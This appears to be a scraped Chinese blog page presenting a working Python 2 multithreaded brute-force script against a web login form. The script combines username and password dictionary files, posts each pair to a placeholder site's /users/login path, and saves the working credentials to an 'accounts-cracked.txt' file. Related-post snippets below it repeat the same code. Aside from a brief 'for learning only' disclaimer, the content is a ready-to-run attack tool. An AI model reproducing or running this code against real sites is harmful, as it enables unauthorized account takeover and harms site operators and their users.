2. 程式人生 > >python爬蟲爆破web表單

python爬蟲爆破web表單

阿新 發佈:2019-02-02 
# -*- coding: utf-8 -*-
#利用python 寫的多執行緒爆破後臺使用者名稱+密碼(自備字典),比較實用,即使是在資訊保安這麼重視的今天,
#還是有人不加驗證碼或者異常訪問限制之類的登陸驗證方式,這樣就很容易被弱口令爆破工具拿下,
#(本程式碼僅限學習實用,禁止進行web攻擊,不承擔法律責任)
import urllib2
import urllib
import httplib
import threading
  
headers = {"Content-Type":"application/x-www-form-urlencoded",     
           "Connection":"Keep-Alive",
           "Referer":"http://www.xxxxx.com/"};# referer:是代理的訪問來源地址
# lock = threading.Lock()
def tryUser(user,password):
    #print user,password
    global headers
    global outFile 
    conn = httplib.HTTPConnection("www.xxxxx.com") # 遠端域名
    if len(user) < 3:     # 限制使用者名稱長度,排除字典中的無用資料
        return  # 主動退出執行緒
    else:
        #lock.acquire()   # 多執行緒操作檔案,提前加鎖,用後釋放
        #line = inFile.readline()          
        #userData = line.strip().split(' # ') # strip() 預設去除空白字元包括' ','\t','\n'等
        #lock.release()
        user = user.strip()
        passwd = password.strip()
        params = urllib.urlencode({'username': user, 'password': passwd})
        conn.request(method="POST", url="/users/login", body=params, headers=headers) # 後臺路徑
        responseText = conn.getresponse().read().decode('utf8') # 網頁編碼
        #print responseText  # 第一次可以列印看看是否解析
        if not responseText.find(u'使用者名稱或者密碼不正確,請重新輸入!') > 0 :
            print '----- find user:', user, 'with password:', passwd, '-----'
            outFile.write(user + '    ' +  passwd + '\n')
              
    return
  
outFile = open('accounts-cracked.txt', 'w')
  
if __name__ == '__main__':
    tsk=[] # 建立執行緒池
    with open(r'user.dic', 'r') as fUser:  
    # 使用with as 來開啟檔案,不需自己關閉檔案,因為他會自己在合適的時候自已關閉(類似C# 中的using(...){}介面)
        with open(r'pass.dic', 'r') as fPass:
            for user in fUser.readlines():
                for password in fPass.readlines():
                    t= threading.Thread(target = tryUser,args=(user,password))
                    t.daemon = False # 設定不進行程序守護
                    tsk.append(t) # t.start()
                fPass.seek(0)
                # 記住這裡要將檔案重新移到檔案首,不然就會出現只執行外層迴圈的第一條,因為內層在
                # 迭代之後(readlines()是迭代器的形式,迭代一次後檔案指標就指到檔案尾了,迭代器
                # 也是end了)第二次就沒有password 在 fPass中,也就是說 for  password in fPass.readlines():
                # 為空,所以這裡的內層迴圈就不會被執行了,因此也就是迭代器清零的問題(C ++ itertor 常有)                                        
    # join()無引數就是完全阻塞主執行緒,等待執行緒執行完 有引數就是說,
    # 在主執行緒等待一秒後就不阻塞執行緒了,繼續執行主執行緒,這裡的意思是一秒鐘開一個執行緒
    # 不能再thread start之前呼叫join(), 因為join() 是執行緒執行時排程
    for t in tsk:
        t.start()
        t.join(1) 
    print "All thread OK,maybe not "
    outFile.close()


相關推薦

python爬蟲爆破web

# -*- coding: utf-8 -*- #利用python 寫的多執行緒爆破後臺使用者名稱+密碼(自備字典),比較實用,即使是在資訊保安這麼重視的今天, #還是有人不加驗證碼或者異常訪問限制之類的登陸驗證方式,這樣就很容易被弱口令爆破工具拿下, #(本程式碼僅限學習

Python爬蟲6】互動

嚴格來說,本篇表單互動和下一篇驗證碼處理不算是網路爬蟲,而是廣義上的網路機器人。使用網路機器人可以減少提取資料時需要表單互動的一道門檻。 1.手工處理髮送POST請求提交登入表單 我們先在示例網站手工註冊一個賬號,註冊這個賬號需要驗證碼,下一篇會介紹處理驗證碼

pythonweb標籤

表單標籤: 1. form標籤    <form action="提交伺服器地址" method="post|get">    </form>    注意:post提交與get提交的區別:  &n

Flask Web開發(一)基於pythonWeb

做一個簡單的web表單,當你輸入使用者名稱的時候會產生相應的歡迎資訊,效果展示如下: 其實空字元提交時會出現一行Resquired()函式產生的提醒文字,截圖時點選螢幕就消失了。。。。 看到導航欄裡有兩個選項,在head中有標籤圖示,這些都是在下

Web提交之disabled問題

rip 使用 輸入框 pan parameter 事件 type .get ron 例如,有如下表單 <form id="inputForm" action="shorttermrental.action" method="post"> <inpu

R語言爬蟲:穿越

lis value val text pen null htm 以及 使用 使用rvest包實現實現穿越表單以及頁面的跳轉 formurl <- "http://open.xmu.edu.cn/oauth2/authorize?client_id=1010&

Go web驗證

選擇 all res true 服務器 過濾 信任 中文 else 開發Web的一個原則就是,不能信任用戶輸入的任何信息,所以驗證和過濾用戶的輸入信息就變得非常重要 必填字段 if len(r.Form["username"][0])==0{ //為空的處理 } 數

Python 爬蟲案例-web微信登陸與消息發送

recv 遺憾 內部 set rmq view ons ats ascii 首先回顧下網頁微信登陸的一般流程   1、打開瀏覽器輸入網址   2、使用手機微信掃碼登陸   3、進入用戶界面 1、打開瀏覽器輸入網址 首先打開瀏覽器輸入web微信網址,並進行監控: h

web使用

scale grid styles doctype style doc mpat gre tle html: <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8

讀書筆記:HTML祕籍Web

//一個html5的表單 <!DOCTYPE html> <html>  <head>   <meta charset="utf-8" />   <title></title&

基於servlet的web登入註冊頁面

這篇部落格存放很久了,才看到一直在草稿箱裡,再整理一下發出來。 結合嗶哩嗶哩教學視訊,實際寫了一遍web的簡單專案。 一、專案結構圖 二、程式碼片段 1.建立實體類 程式碼如下: package com.liumce.bean; import

flask web開發(四) web csrf,重定向

# -*- coding: cp936 -*- import os import sys import logging.config import flask import socket from flask import Flask,jsonify from flask i

PHP使用CURL向Python,Golang傳送檔案上傳檔案[HTTP協議下Api]

PHP傳送方程式碼段: <?php /** * htppCurl表單上傳檔案 * @param $file FILE_ADDR * @param string $url uri * @param string $key key * @return bool|mixed *

Flask 裏的WEB應用

邏輯 lse message 允許 輸入 req reg 頁面 route 它是HTML頁面中負責數據采集的部件。表單有三個部分組成:表單標簽、表單域、表單按鈕。表單允許用戶輸入數據,負責HTML頁面數據采集,通過表單將用戶輸入的數據提交給服務器。 創建模板文件 log

Flask ~~“一見鍾情之初體驗”(Web

之前我們講了Flask中的過濾  繼承  包含  巨集   今天來說說表單,說起表單大家都不陌生吧,在html中form表單一般用於採集資料和提交資料,在Flask中當然也有表單,現在就說說Flask中的表單的簡單應用。 在說表單前給大家先說一下Flask中

Python學習:HTML

HTML表單用於從客戶端收集使用者在瀏覽器中的輸入,是HTML實現客戶端與伺服器互動的核心方法。 ####一、文字輸入 分類 標籤 單行文字 <input type="text"> 多行文字 <textarea>

Flask Web 開發 web

 hello.py:定義表單類 from flask.ext.wtf import Form from wtforms import StringField, SubmitField from wtforms.validators import Required cla

flask中web應用

web表單: 製作簡易表單有幾個步驟: 1, 跨站請求偽造保護 2, 表單類 3, 在檢視函式中處理表單 4, 在html檔案中處理表單 5, 關於重定向和使用者會話 —- – – ———分割線之具體步驟 0,先安裝 pip i

Flask 裡的WEB應用

它是HTML頁面中負責資料採集的部件。表單有三個部分組成:表單標籤、表單域、表單按鈕。表單允許使用者輸入資料,負責HTML頁面資料採集,通過表單將使用者輸入的資料提交給伺服器。 建立模板檔案 login.html,在其中直接寫form表單: 使用者名稱: 密碼: 確認

web 提交按鈕的測試點

 軟體測試交流群,歡迎測試的大蝦,新人加入本群,一起探討測試技術的學習,群裡面也有很多資料,656721740web表單中的提交按鈕的測試點:在提交前需要理解清楚的點:1、表單中哪些欄位是必填項2、表單中欄位內容的限制:非空、重複、長度、特殊字元,空格、以及一些和業務相關的約